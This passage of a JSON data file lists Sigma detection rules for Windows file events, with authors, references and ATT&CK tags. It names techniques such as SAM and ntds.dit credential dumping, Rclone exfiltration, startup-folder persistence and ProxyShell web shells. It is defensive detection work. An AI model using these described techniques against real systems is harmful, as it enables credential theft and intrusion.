2021, \"We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence.\nAccordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats.\nIn the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL\"\n", + "meta": { + "author": "Christopher Peacock '@securepeacock', SCYTHE", + "creation_date": "2021/10/24", + "falsepositive": [ + "Unknown", + "Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware." + ], + "filename": "file_event_win_powershell_startup_shortcuts.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/intelligence-insights-october-2021/", + "https://github.com/redcanaryco/atomic-red-team/blob/36d49de4c8b00bf36054294b4a1fcbab3917d7c5/atomics/T1547.001/T1547.001.md#atomic-test-7---add-executable-shortcut-link-to-user-startup-folder", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_startup_shortcuts.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "92fa78e7-4d39-45f1-91a3-8b23f3f1088d", + "value": "PowerShell Writing Startup Shortcuts" + }, + { + "description": "Detects a dump file written by QuarksPwDump password dumper", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/02/10", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_quarkspw_filedump.yml", + "level": "critical", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/QuarksPWDump.htm", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_quarkspw_filedump.yml" + ], 
+ "tags": [ + "attack.credential_access", + "attack.t1003.002" + ] + }, + "uuid": "847def9e-924d-4e90-b7c4-5f581395a2b4", + "value": "QuarksPwDump Dump File" + }, + { + "description": "Detects Rclone config file being created", + "meta": { + "author": "Aaron Greetham (@beardofbinary) - NCC Group", + "creation_date": "2021/05/26", + "falsepositive": [ + "Legitimate Rclone usage (rare)" + ], + "filename": "file_event_win_rclone_exec_file.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_rclone_exec_file.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567.002" + ] + }, + "uuid": "34986307-b7f4-49be-92f3-e7a4d01ac5db", + "value": "Rclone Config File Creation" + }, + { + "description": "Detects actions caused by the RedMimicry Winnti playbook", + "meta": { + "author": "Alexander Rausch", + "creation_date": "2020/06/24", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_redmimicry_winnti_filedrop.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://redmimicry.com", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_redmimicry_winnti_filedrop.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027" + ] + }, + "uuid": "130c9e58-28ac-4f83-8574-0a4cc913b97e", + "value": "RedMimicry Winnti Playbook Dropped File" + }, + { + "description": "Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.", + "meta": { + "author": "SecurityAura", + "creation_date": "2022/11/16", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_remote_cred_dump.yml", + "level": "high", + "logsource.category": "file_event", + 
"logsource.product": "windows", + "refs": [ + "https://github.com/Porchetta-Industries/CrackMapExec", + "https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_remote_cred_dump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003" + ] + }, + "uuid": "6e2a900a-ced9-4e4a-a9c2-13e706f9518a", + "value": "Remote Credential Dump" + }, + { + "description": "Detects a phishing attack which expands a ZIP file containing a malicious shortcut. If the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder. Additionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.", + "meta": { + "author": "Greg (rule)", + "creation_date": "2022/07/21", + "falsepositive": "No established falsepositives", + "filename": "file_event_win_ripzip_attack.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/jonasLyk/status/1549338335243534336?t=CrmPocBGLbDyE4p6zTX1cg&s=19", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ripzip_attack.yml" + ], + "tags": [ + "attack.t1547", + "attack.persistence" + ] + }, + "uuid": "a6976974-ea6f-4e97-818e-ea08625c52cb", + "value": "RipZip Attack on Startup Folder" + }, + { + "description": "Detects the creation of files that look like exports of the local SAM (Security Account Manager)", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/02/11", + "falsepositive": [ + "Rare cases of administrative activity" + ], + "filename": "file_event_win_sam_dump.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + 
"https://github.com/search?q=CVE-2021-36934", + "https://github.com/cube0x0/CVE-2021-36934", + "https://www.google.com/search?q=%22reg.exe+save%22+sam", + "https://github.com/HuskyHacks/ShadowSteal", + "https://github.com/FireFart/hivenightmare", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sam_dump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002" + ] + }, + "uuid": "4e87b8e2-2ee9-4b2a-a715-4727d297ece0", + "value": "SAM Dump File Creation" + }, + { + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "meta": { + "author": "frack113", + "creation_date": "2022/02/13", + "falsepositive": [ + "Legitimate use" + ], + "filename": "file_event_win_screenconnect_artefact.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-5---screenconnect-application-download-and-install-on-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_screenconnect_artefact.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "fec96f39-988b-4586-b746-b93d59fd1922", + "value": "ScreenConnect Temporary Installation Artefact" + }, + { + "description": "This rule will monitor executable and script file creation by office applications. 
Please add more file extensions or magic bytes to the logic of your choice.", + "meta": { + "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_script_creation_by_office_using_file_ext.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", + "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_script_creation_by_office_using_file_ext.yml" + ], + "tags": [ + "attack.t1204.002", + "attack.execution" + ] + }, + "uuid": "c7a74c80-ba5a-486e-9974-ab9e682bc5e4", + "value": "Created Files by Office Applications" + }, + { + "description": "Detects a Windows executable that writes files to suspicious folders", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/11/20", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_shell_write_susp_directory.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_shell_write_susp_directory.yml" + ], + "tags": "No established tags" + }, + "uuid": "1277f594-a7d1-4f28-a2d3-73af5cbeab43", + "value": "Windows Shell File Write to Suspicious Folder" + }, + { + "description": "Detects windows executables that writes files with suspicious extensions", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/12", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_shell_write_susp_files_extensions.yml", + "level": "high", + "logsource.category": 
"file_event", + "logsource.product": "windows", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_shell_write_susp_files_extensions.yml" + ], + "tags": "No established tags" + }, + "uuid": "b8fd0e93-ff58-4cbd-8f48-1c114e342e62", + "value": "Windows Binaries Write Suspicious Extensions" + }, + { + "description": "A General detection for files being created in the Windows startup directory. This could be an indicator of persistence.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/05/02", + "falsepositive": [ + "An FP could be caused by legitimate application writing shortcuts for example. This folder should always be inspected to make sure that all the files in there are legitimate" + ], + "filename": "file_event_win_startup_folder_file_write.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/OTRF/detection-hackathon-apt29/issues/12", + "https://threathunterplaybook.com/evals/apt29/detections/5.B.1_611FCA99-97D0-4873-9E51-1C1BA2DBB40D.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_startup_folder_file_write.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "2aa0a6b4-a865-495b-ab51-c28249537b75", + "value": "Startup Folder File Write" + }, + { + "description": "Detects the usage of ADSI (LDAP) operations by tools. This may also detect tools like LDAPFragger.", + "meta": { + "author": "xknow @xknow_infosec, Tim Shelton", + "creation_date": "2019/03/24", + "falsepositive": [ + "Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc." 
+ ], + "filename": "file_event_win_susp_adsi_cache_usage.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961", + "https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/", + "https://github.com/fox-it/LDAPFragger", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_adsi_cache_usage.yml" + ], + "tags": [ + "attack.t1001.003", + "attack.command_and_control" + ] + }, + "uuid": "75bf09fa-1dd7-4d18-9af9-dd9e492562eb", + "value": "Suspicious ADSI-Cache Usage By Unknown Tool" + }, + { + "description": "Detects suspicious .NET assembly executions. Could detect using Cobalt Strike's command execute-assembly.", + "meta": { + "author": "omkar72, oscd.community, Wojciech Lesicki", + "creation_date": "2020/10/12", + "falsepositive": [ + "Rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process - https://twitter.com/SBousseaden/status/1388064061087260675" + ], + "filename": "file_event_win_susp_clr_logs.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html", + "https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/", + "https://github.com/olafhartong/sysmon-modular/blob/5e5f6d90819a7f35eec0aba08021d0d201bb9055/11_file_create/include_dotnet.xml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_clr_logs.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1059.001", + "attack.t1218" + ] + }, + "uuid": "e4b63079-6198-405c-abd7-3fe8b0ce3263", + "value": "Suspicious CLR Logs Creation" + }, + { + "description": 
"Once executed, colorcpl.exe will copy the arbitrary file to c:\\windows\\system32\\spool\\drivers\\color\\", + "meta": { + "author": "frack113", + "creation_date": "2022/01/21", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_susp_colorcpl.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/eral4m/status/1480468728324231172?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_colorcpl.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564" + ] + }, + "uuid": "e15b518d-b4ce-4410-a9cd-501f23ce4a18", + "value": "Suspicious Creation with Colorcpl" + }, + { + "description": "This rule detects suspicious files created by Microsoft Sync Center (mobsync)", + "meta": { + "author": "elhoim", + "creation_date": "2022/04/28", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_susp_creation_by_mobsync.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/intelligence-insights-november-2021/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_creation_by_mobsync.yml" + ], + "tags": [ + "attack.t1055", + "attack.t1218", + "attack.execution", + "attack.defense_evasion" + ] + }, + "uuid": "409f8a98-4496-4aaa-818a-c931c0a8b832", + "value": "Created Files by Microsoft Sync Center" + }, + { + "description": "Detects the creation of copy of suspicious files (EXE/DLL) to the default GPO storage folder", + "meta": { + "author": "elhoim", + "creation_date": "2022/04/28", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_susp_default_gpo_dir_write.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/intelligence-insights-november-2021/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_default_gpo_dir_write.yml" + ], + "tags": [ + "attack.t1036.005", + "attack.defense_evasion" + ] + }, + "uuid": "5f87308a-0a5b-4623-ae15-d8fa1809bc60", + "value": "Suspicious Files in Default GPO Folder" + }, + { + "description": "Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/07/03", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "filename": "file_event_win_susp_desktopimgdownldr_file.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/", + "https://twitter.com/SBousseaden/status/1278977301745741825", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_desktopimgdownldr_file.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1105" + ] + }, + "uuid": "fc4f4817-0c53-4683-a4ee-b17a64bc1039", + "value": "Suspicious Desktopimgdownldr Target File" + }, + { + "description": "Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. 
renaming files) without changing them on disk.", + "meta": { + "author": "Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO)", + "creation_date": "2020/03/19", + "falsepositive": [ + "Operations performed through Windows SCCM or equivalent", + "Read only access list authority" + ], + "filename": "file_event_win_susp_desktop_ini.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_desktop_ini.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.009" + ] + }, + "uuid": "81315b50-6b60-4d8f-9928-3466e1022515", + "value": "Suspicious desktop.ini Action" + }, + { + "description": "Ransomware create txt file in the user Desktop", + "meta": { + "author": "frack113", + "creation_date": "2021/12/26", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_susp_desktop_txt.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1486/T1486.md#atomic-test-5---purelocker-ransom-note", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_desktop_txt.yml" + ], + "tags": [ + "attack.impact", + "attack.t1486" + ] + }, + "uuid": "caf02a0a-1e1c-4552-9b48-5e070bd88d11", + "value": "Suspicious Creation TXT File in User Desktop" + }, + { + "description": "Detects the creation of diagcab file, which could be caused by some legitimate installer or is a sign of exploitation (review the filename and its location)", + "meta": { + "author": "frack113", + "creation_date": "2022/06/08", + "falsepositive": [ + "Legitimate microsoft diagcab" + ], + "filename": "file_event_win_susp_diagcab.yml", + "level": "medium", + "logsource.category": 
"file_event", + "logsource.product": "windows", + "refs": [ + "https://threadreaderapp.com/thread/1533879688141086720.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_diagcab.yml" + ], + "tags": [ + "attack.resource_development" + ] + }, + "uuid": "3d0ed417-3d94-4963-a562-4a92c940656a", + "value": "Creation of a Diagcab" + }, + { + "description": "Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that windows hide default extensions by default.", + "meta": { + "author": "Nasreddine Bencherchali, frack113", + "creation_date": "2022/06/19", + "falsepositive": [ + "Unlikely" + ], + "filename": "file_event_win_susp_double_extension.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/", + "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations", + "https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles", + "https://twitter.com/malwrhunterteam/status/1235135745611960321", + "https://twitter.com/luc4m/status/1073181154126254080", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_double_extension.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.007" + ] + }, + "uuid": "b4926b47-a9d7-434c-b3a0-adc3fa0bd13e", + "value": "Suspicious Double Extension Files" + }, + { + "description": "Detects the creation of an executable by another executable", + "meta": { + "author": "frack113", + "creation_date": "2022/03/09", + "falsepositive": [ + "Software installers", + "Update utilities" + ], + "filename": "file_event_win_susp_dropper.yml", + "level": "low", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "Malware 
Sandbox", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_dropper.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1587.001" + ] + }, + "uuid": "297afac9-5d02-4138-8c58-b977bac60556", + "value": "Creation of an Executable by an Executable" + }, + { + "description": "Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/02/25", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_susp_exchange_aspx_write.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/blackbyte-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_exchange_aspx_write.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "attack.persistence", + "attack.t1505.003" + ] + }, + "uuid": "7280c9f3-a5af-45d0-916a-bc01cb4151c9", + "value": "Suspicious MSExchangeMailboxReplication ASPX Write" + }, + { + "description": "Detect creation of suspicious executable file name. 
Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.", + "meta": { + "author": "frack113", + "creation_date": "2022/09/05", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_susp_executable_creation.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae", + "https://app.any.run/tasks/76c69e2d-01e8-49d9-9aea-fb7cc0c4d3ad/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_executable_creation.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564" + ] + }, + "uuid": "74babdd6-a758-4549-9632-26535279e654", + "value": "Suspicious Executable File Creation" + }, + { + "description": "Get-Variable is a valid PowerShell cmdlet\nWindowsApps is by default in the path where PowerShell is executed.\nSo when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.\n", + "meta": { + "author": "frack113", + "creation_date": "2022/04/23", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_susp_get_variable.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/", + "https://www.joesandbox.com/analysis/465533/0/html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_get_variable.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546", + "attack.defense_evasion", + "attack.t1027" + ] + }, + "uuid": "0c3fac91-5627-46e8-a6a8-a0d7b9b8ae1b", + "value": "Suspicious 
Get-Variable.exe Creation" + }, + { + "description": "Detects dropped files with LNK double extension, which is often used by malware as a method to abuse the fact that windows hide default extensions by default.", + "meta": { + "author": "Nasreddine Bencherchali, frack113", + "creation_date": "2022/11/07", + "falsepositive": [ + "Users creating a shortcut on e.g. desktop" + ], + "filename": "file_event_win_susp_lnk_double_extension.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/", + "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations", + "https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles", + "https://twitter.com/malwrhunterteam/status/1235135745611960321", + "https://twitter.com/luc4m/status/1073181154126254080", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_lnk_double_extension.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.007" + ] + }, + "uuid": "3215aa19-f060-4332-86d5-5602511f3ca8", + "value": "Suspicious LNK Double Extension Files" + }, + { + "description": "Detects suspicious processes that write (copy) a Active Directory database (ntds.dit) file", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/11", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_susp_ntds_dit.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://stealthbits.com/blog/extracting-password-hashes-from-the-ntds-dit-file/", + "https://adsecurity.org/?p=2398", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_ntds_dit.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002", + 
"attack.t1003.003" + ] + }, + "uuid": "11b1ed55-154d-4e82-8ad7-83739298f720", + "value": "Suspicious Process Writes Ntds.dit" + }, + { + "description": "A general detection for processes creating PFX files. This could be an indicator of an adversary exporting a local certificate to a PFX file.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/05/02", + "falsepositive": [ + "System administrators managing certififcates." + ], + "filename": "file_event_win_susp_pfx_file_creation.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/OTRF/detection-hackathon-apt29/issues/14", + "https://threathunterplaybook.com/evals/apt29/detections/6.B.1_6392C9F1-D975-4F75-8A70-433DEDD7F622.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_pfx_file_creation.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.004" + ] + }, + "uuid": "dca1b3e8-e043-4ec8-85d7-867f334b5724", + "value": "Suspicious PFX File Creation" + }, + { + "description": "Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence", + "meta": { + "author": "HieuTT35, Nasreddine Bencherchali", + "creation_date": "2019/10/24", + "falsepositive": [ + "System administrator create Powershell profile manually" + ], + "filename": "file_event_win_susp_powershell_profile.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/", + "https://persistence-info.github.io/Data/powershellprofile.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_powershell_profile.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + 
"attack.t1546.013" + ] + }, + "uuid": "b5b78988-486d-4a80-b991-930eff3ff8bf", + "value": "PowerShell Profile Modification" + }, + { + "description": "Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder.\nThis driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU.\n", + "meta": { + "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", + "creation_date": "2019/04/08", + "falsepositive": [ + "Other legimate tools using this driver and filename (like Sysinternals). Note - Clever attackers may easily bypass this detection by just renaming the driver filename. Therefore just Medium-level and don't rely on it." + ], + "filename": "file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml" + ], + "tags": [ + "attack.t1562.001", + "attack.defense_evasion" + ] + }, + "uuid": "3da70954-0f2c-4103-adff-b7440368f50e", + "value": "Suspicious PROCEXP152.sys File Created In TMP" + }, + { + "description": "Detects the creation of suspcious binary files inside the \"\\windows\\system32\\spool\\drivers\\color\\\" as seen in the blog referenced below", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/28", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_susp_spool_drivers_color_drop.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_spool_drivers_color_drop.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "ce7066a6-508a-42d3-995b-2952c65dc2ce", + "value": "Drop Binaries Into Spool Drivers Color Folder" + }, + { + "description": "Detects when a file with a suspicious extension is created in the startup folder", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/10", + "falsepositive": [ + "Rare legitimate usage of some of the extensions mentioned in the rule" + ], + "filename": "file_event_win_susp_startup_folder_persistence.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/last-byte/PersistenceSniper", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_startup_folder_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "28208707-fe31-437f-9a7f-4b1108b94d2e", + "value": "Suspicious Startup Folder Persistence" + }, + { + "description": "Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/12/07", + "falsepositive": [ + "Administrative activity", + "PowerShell scripts running as SYSTEM user" + ], + "filename": "file_event_win_susp_system_interactive_powershell.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/PowerSploit_Invoke-Mimikatz.htm", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_system_interactive_powershell.yml" + ], + "tags": "No established tags" + }, + "uuid": "5b40a734-99b6-4b98-a1d0-1cea51a08ab2", + "value": "Suspicious Interactive PowerShell as SYSTEM" + }, + { + "description": 
"Detects the creation of tasks from processes executed from suspicious locations", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/11/16", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_susp_task_write.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_task_write.yml" + ], + "tags": [ + "attack.persistence", + "attack.execution", + "attack.t1053" + ] + }, + "uuid": "80e1f67a-4596-4351-98f5-a9c3efabac95", + "value": "Suspicious Scheduled Task Write to System32 Tasks" + }, + { + "description": "Detects the creation of log files during a TeamViewer remote session", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/30", + "falsepositive": [ + "Legitimate uses of TeamViewer in an organisation" + ], + "filename": "file_event_win_susp_teamviewer_remote_session.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.teamviewer.com/en-us/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_teamviewer_remote_session.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "162ab1e4-6874-4564-853c-53ec3ab8be01", + "value": "TeamViewer Remote Session" + }, + { + "description": "Detects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a 